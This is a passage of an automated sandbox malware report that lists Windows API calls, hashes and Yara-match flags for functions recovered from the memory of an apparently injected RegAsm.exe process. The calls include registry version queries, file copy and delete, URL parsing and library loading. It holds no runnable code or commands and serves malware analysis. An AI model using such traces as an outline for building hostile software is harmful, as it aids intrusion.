                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                      • String ID: %d MB
                                                                                      • API String ID: 3644086013-2651807785
                                                                                      • Opcode ID: 8862206487a5735529afe943f838936f5b8579a15e145366872ddc586f9bf33b
                                                                                      • Instruction ID: b0b061f5290e25b68b6f7a4002290a0ac05d972f49bd8262d04e688218eddb93
                                                                                      • Opcode Fuzzy Hash: 8862206487a5735529afe943f838936f5b8579a15e145366872ddc586f9bf33b
                                                                                      • Instruction Fuzzy Hash: 7801A9B1E00218ABEB08DFB4DC45EEEB7B9EF08705F44006AF602D7290EA75D9818759
                                                                                      APIs
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B
                                                                                      • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B79
                                                                                      • RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B95
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocOpenProcessQueryValue
                                                                                      • String ID: Windows 11
                                                                                      • API String ID: 3676486918-2517555085
                                                                                      • Opcode ID: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
                                                                                      • Instruction ID: c636f12a4b9fd3341eb7223670fa9a8d4496e2c02347a6f2be12f88bf3247473
                                                                                      • Opcode Fuzzy Hash: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
                                                                                      • Instruction Fuzzy Hash: 1AF06875600304FBFF149BD1DC4AFAB7A7EEB4470AF1410A5F601D5190E7B6AA909714
                                                                                      APIs
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BBD
                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BC4
                                                                                      • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BE2
                                                                                      • RegQueryValueExA.KERNEL32(00436888,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ), ref: 00410BFD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocOpenProcessQueryValue
                                                                                      • String ID: CurrentBuildNumber
                                                                                      • API String ID: 3676486918-1022791448
                                                                                      • Opcode ID: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
                                                                                      • Instruction ID: adfa9e2f60a12e4d5f9b95a3627e322926d469c0f3b43989f67d349f50e983ff
                                                                                      • Opcode Fuzzy Hash: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
                                                                                      • Instruction Fuzzy Hash: E9F09075640304BBEF159B90DC0AFAF7A7EEB44B06F240055F601A50A0E6B25A909B50
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 004156A4
                                                                                      • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 004156C4
                                                                                      • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 004156EA
                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00415725
                                                                                      • lstrcatA.KERNEL32(?), ref: 00415738
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrcat$OpenQueryValue_memset
                                                                                      • String ID:
                                                                                      • API String ID: 3357907479-0
                                                                                      • Opcode ID: 61c845370fa5e20ce0e4bed28fcb2d467033b3eb1257b194b560fd969d8f00f9
                                                                                      • Instruction ID: 247fa685f6815e34cff7f8df4b350b2d93bc7a81ee75f5ea83cfe721da60279c
                                                                                      • Opcode Fuzzy Hash: 61c845370fa5e20ce0e4bed28fcb2d467033b3eb1257b194b560fd969d8f00f9
                                                                                      • Instruction Fuzzy Hash: 6941CE7194011D9FDF24EF60EC86EE8777ABB18309F4004AAB109A31A0EE759FC59F94
                                                                                      APIs
                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,759774F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C), ref: 0041BC6E
                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,759774F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000), ref: 0041BCA6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: File$CreatePointer
                                                                                      • String ID:
                                                                                      • API String ID: 2024441833-0
                                                                                      • Opcode ID: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
                                                                                      • Instruction ID: ff1efad9a67633d22899531c3285d4c1b5d125596630838d4b1aaea72c6dc67b
                                                                                      • Opcode Fuzzy Hash: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
                                                                                      • Instruction Fuzzy Hash: CA31A2F0504B049FDB348F24A9D4BA37AE8EB15314F108E2FF19682691D33898C49B99
                                                                                      APIs
                                                                                      • GetSystemInfo.KERNEL32(?), ref: 6C0FC947
                                                                                      • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C0FC969
                                                                                      • GetSystemInfo.KERNEL32(?), ref: 6C0FC9A9
                                                                                      • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C0FC9C8
                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C0FC9E2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Virtual$AllocInfoSystem$Free
                                                                                      • String ID:
                                                                                      • API String ID: 4191843772-0
                                                                                      • Opcode ID: 092ded7c542a035f3c0ba023e5cdf9541d45004dffba8d55877eacf50927b7d8
                                                                                      • Instruction ID: a27fd17dbf4742c9f4cc35a286d74f25eceafee9ee36f89d0833835e5eb2a157
                                                                                      • Opcode Fuzzy Hash: 092ded7c542a035f3c0ba023e5cdf9541d45004dffba8d55877eacf50927b7d8
                                                                                      • Instruction Fuzzy Hash: E1210A317052146BDB14AE65CC89BBE73F9AF86344F50012EFD53A7B40DB70A944D790
                                                                                      APIs
                                                                                      • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                      • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                      • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                      • lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                      • InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CrackInternetlstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 1274457161-0
                                                                                      • Opcode ID: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
                                                                                      • Instruction ID: f1c5382da97c9dd65e4db87c3c806c9c9b4e03b01775002e3606c6f6cd357758
                                                                                      • Opcode Fuzzy Hash: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
                                                                                      • Instruction Fuzzy Hash: E9011B72D00218ABDF149BA9DC45ADEBFB8AF55330F10821AF925F72E0DB745A058B94
                                                                                      APIs
                                                                                      • GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,0040DB0A), ref: 004083F2
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                        • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                        • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                      • SetEnvironmentVariableA.KERNEL32(?,00437194,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,004367C3,?,?,?,?,?,?,?,?,0040DB0A), ref: 00408447
                                                                                      • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0040DB0A), ref: 0040845B
                                                                                      Strings
                                                                                      • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004083E6, 004083EB, 00408405
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                      • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                      • API String ID: 2929475105-3463377506
                                                                                      • Opcode ID: 04dcee5354247dbc29cf1765c19ad916d25bce8febd7e9a612e053264f62c16e
                                                                                      • Instruction ID: 1d1035b7872eafe5bc2acfcfd9c5443481a9431a5cd399c5b03dff48eed801cb
                                                                                      • Opcode Fuzzy Hash: 04dcee5354247dbc29cf1765c19ad916d25bce8febd7e9a612e053264f62c16e
                                                                                      • Instruction Fuzzy Hash: 20315C71940714ABCF16EF2AED0245D7BA2AB48706F10607BF440B72B0DB7A1A81CF89
                                                                                      APIs
                                                                                      • __EH_prolog3_catch.LIBCMT ref: 00416DCD
                                                                                      • lstrlenA.KERNEL32(?,0000001C), ref: 00416DD8
                                                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416E5C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: H_prolog3_catchlstrlen
                                                                                      • String ID: ERROR
                                                                                      • API String ID: 591506033-2861137601
                                                                                      • Opcode ID: 987378090a3b2abee121885682ea4995d8af358216b926a009c89c00a445330c
                                                                                      • Instruction ID: af559da7a52deda925aca90371b7d636d26c87dd73bd3b1907a7f448f6be4e16
                                                                                      • Opcode Fuzzy Hash: 987378090a3b2abee121885682ea4995d8af358216b926a009c89c00a445330c
                                                                                      • Instruction Fuzzy Hash: 6F119371900509AFCB40FF75D9025DDBBB1BF04308B90513AE414E3591E739EAA98FC9
                                                                                      APIs
                                                                                      • OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
                                                                                      • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0041228E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                      • String ID: =A
                                                                                      • API String ID: 3183270410-2399317284
                                                                                      • Opcode ID: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
                                                                                      • Instruction ID: 00f88837b3f4b8dbd17d966d98a560f1caae43d713f472eddac2d47ecb876e1e
                                                                                      • Opcode Fuzzy Hash: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
                                                                                      • Instruction Fuzzy Hash: D8F0B471600218ABDB24EB68DC45FEE7BBC9B48B08F00006AF645D7180EEB5DAC5CB55
                                                                                      APIs
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                        • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                      • CopyFileA.KERNEL32(?,?,00000001,00437414,0043681B,?,?,?), ref: 0040B3D7
                                                                                      • lstrlenA.KERNEL32(?), ref: 0040B529
                                                                                      • lstrlenA.KERNEL32(?), ref: 0040B544
                                                                                      • DeleteFileA.KERNEL32(?), ref: 0040B596
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                      • String ID:
                                                                                      • API String ID: 211194620-0
                                                                                      • Opcode ID: 9e3b5aa9e4815655d37b580d824bd8f900de3d495d383a8751fe16bf523792ad
                                                                                      • Instruction ID: f50e13fd7eda3401684194e3b4178dcbc35dad14aaafdb4021fb065c0cc55dd5
                                                                                      • Opcode Fuzzy Hash: 9e3b5aa9e4815655d37b580d824bd8f900de3d495d383a8751fe16bf523792ad
                                                                                      • Instruction Fuzzy Hash: 6F714072A00119ABCF01FFA5EE468CD7775EF14309F104036F500B71A2DBB9AE898B99
                                                                                      APIs
